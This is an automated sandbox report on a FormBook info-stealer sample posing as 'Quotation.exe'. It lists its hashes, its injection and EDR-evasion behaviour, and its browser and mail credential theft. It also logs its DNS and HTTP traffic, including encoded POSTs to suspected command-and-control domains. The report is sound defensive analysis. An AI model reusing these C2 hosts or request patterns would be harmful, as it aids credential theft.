Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1560309
MD5:c7d6d34ddd68d74c5a19706389c194b3
SHA1:3408f89d12a1d074e6e8d986358bc47004992634
SHA256:d427e886742374abc13d828803e196079832b38dc7d6d560ee0e2425612a3832
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • Quotation.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: C7D6D34DDD68D74C5A19706389C194B3)
    • svchost.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • iEbayRsPzr.exe (PID: 3916 cmdline: "C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 7132 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • iEbayRsPzr.exe (PID: 3192 cmdline: "C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Quotation.exe", CommandLine: "C:\Users\user\Desktop\Quotation.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 6876, ParentProcessName: Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation.exe", ProcessId: 6972, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Quotation.exe", CommandLine: "C:\Users\user\Desktop\Quotation.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 6876, ParentProcessName: Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Quotation.exe", ProcessId: 6972, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.acond-22-mvr.click/w9z4/?GzeXFT7=68uIQ7XuXrYyzH3jGwxTrPeynRmH3PyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfdceGGDC9QtpScRVRYhm/IS5VlT3jRiR+euo=&aJZ=OnOxa0A0n0BXj0Avira URL Cloud: Label: malware
            Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Quotation.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1807163533.0000000002350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4153859455.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4154038059.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4155924526.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807834480.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152729968.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1807419459.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4153920591.0000000002D80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Quotation.exeJoe Sandbox ML: detected
            Source: Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: pcaui.pdb source: svchost.exe, 00000001.00000003.1775441175.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775695281.000000000283C000.00000004.00000020.00020000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153400440.0000000001188000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iEbayRsPzr.exe, 00000002.00000002.4152726615.000000000071E000.00000002.00000001.01000000.00000004.sdmp, iEbayRsPzr.exe, 00000005.00000002.4152728546.000000000071E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.1709702687.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Quotation.exe, 00000000.00000003.1703252029.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715656038.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713157459.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1821700530.00000000047BF000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1819384297.0000000004601000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004970000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation.exe, 00000000.00000003.1709702687.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Quotation.exe, 00000000.00000003.1703252029.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1807448849.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715656038.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713157459.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1821700530.00000000047BF000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000003.1819384297.0000000004601000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004970000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154250953.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: pcaui.exe, 00000003.00000002.4153023182.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2114722152.000000003451C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000003.00000002.4153023182.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000003.00000002.4154775790.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, iEbayRsPzr.exe, 00000005.00000002.4154120992.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2114722152.000000003451C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000001.00000003.1775441175.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775695281.000000000283C000.00000004.00000020.00020000.00000000.sdmp, iEbayRsPzr.exe, 00000002.00000002.4153400440.0000000001188000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.rtpterbaruwaktu3.xyz
            Source: DNS query: www.54248711.xyz
            Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /7yx4/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=m5A4fx9ZIvMjycGTXvyw9uJmE8MC06yi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQczXh8T6WPeXIwty/TEDOHxdjdmbI+7yKQjQ= HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /klhq/?GzeXFT7=AHY/rhT5FAaHaOQvyjmolPV0Gci6vpbrO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+kcDBiU8NkZcujbIB4aDN0RaZvptmL2rjFAE=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /w9z4/?GzeXFT7=68uIQ7XuXrYyzH3jGwxTrPeynRmH3PyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfdceGGDC9QtpScRVRYhm/IS5VlT3jRiR+euo=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /11t3/?GzeXFT7=BoXQYlgPFtFW2+QFcsMkz8ZnQyv1gPD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01336IGNy75YpYvoXliURpgNXuxXH/BaJU0H7s=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /2pji/?GzeXFT7=67iA4TPPdQ9nEroy4uzQwLjmbdlqhQsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT7wZt3N4B7jiHnWlWePCYt+UXdYLjL0ZgeX4=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /egqi/?GzeXFT7=b73RclDzsQx9LNfKXEn0LSRo1QZueGUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8iuZq94lDlsrAFGhvrGfR3NsOl2e42KNKrIU=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /hyyd/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=fqlLWWUWU+rKW3Ee0UVO0B/wSDzUS5U2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXwTX1CxmsRTufMD7rgZabFSEYAFPL6HYYC58= HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /rsvy/?GzeXFT7=r8TqL8lVmKhCyKgitQBFywHntQnNTxsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rXvvnrxwIlwzliiyA/L7dY/WJb14Y701b98g=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /huvt/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=yxXU4HpAbhaf+Ok3Aej6zxGwiCQCqWNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPbkXZZc5h44QYxsw3x5GAutS7NMZYCP3hSt0= HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /6gtt/?GzeXFT7=SGA0vAB7ljjiJZB705auu5nMqwjvdcjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbZvGne3nysZQrZ3blxXWxNHaQaYJ6iy4iy6k=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.gogawithme.liveAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /jm2l/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=M21ir/NSFfGrmB4sne/SCCGX/e/txCX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyn/BAme0mP+U7kiozXG5r1hn7yWn0dKNvWy4= HTTP/1.1Host: www.54248711.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSe3+c8RKpZ8QdwyK2YX5FHCjlm36TVHFBRCwU=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.canadavinreport.siteAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /z3ox/?GzeXFT7=XRVN9XS8GrL3N+/zP5xupTrPTPxZEWj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhTkfYyaZjFsNsjC0F7uv9kyVhrOa9L+DA6gc=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.questmatch.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /crrp/?GzeXFT7=upjfZKq4/ZGfoF/MvQQxhfVT264zV9bCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/nGZJ+pHk7Nqqe9OIf3jZd8YCzRO5KH2eHFc=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficHTTP traffic detected: GET /6wln/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=gk6EUi6sTSAX9bdw0FF5qpRAaiCMK60Ih0859QLLBHNHxoVqcUaJ5GMhXvTh6fdanKOBrZcLB2201dVdXc1CFZPk2QWw1QtBA7h//Mif1prUBHwa19uPi+o= HTTP/1.1Host: www.3kw40881107247y.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
            Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
            Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
            Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
            Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
            Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
            Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
            Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
            Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
            Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
            Source: global trafficDNS traffic detected: DNS query: www.gogawithme.live
            Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
            Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
            Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
            Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
            Source: global trafficDNS traffic detected: DNS query: www.3kw40881107247y.click
            Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
            Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 47 7a 65 58 46 54 37 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 6f 38 4e 78 71 4c 61 46 34 45 7a 6b 72 57 6f 71 66 44 43 71 77 4a 7a 44 46 4b 6d 39 67 43 78 51 41 3d 3d Data Ascii: GzeXFT7=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2co8NxqLaF4EzkrWoqfDCqwJzDFKm9gCxQA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 21 Nov 2024 15:57:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:57:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
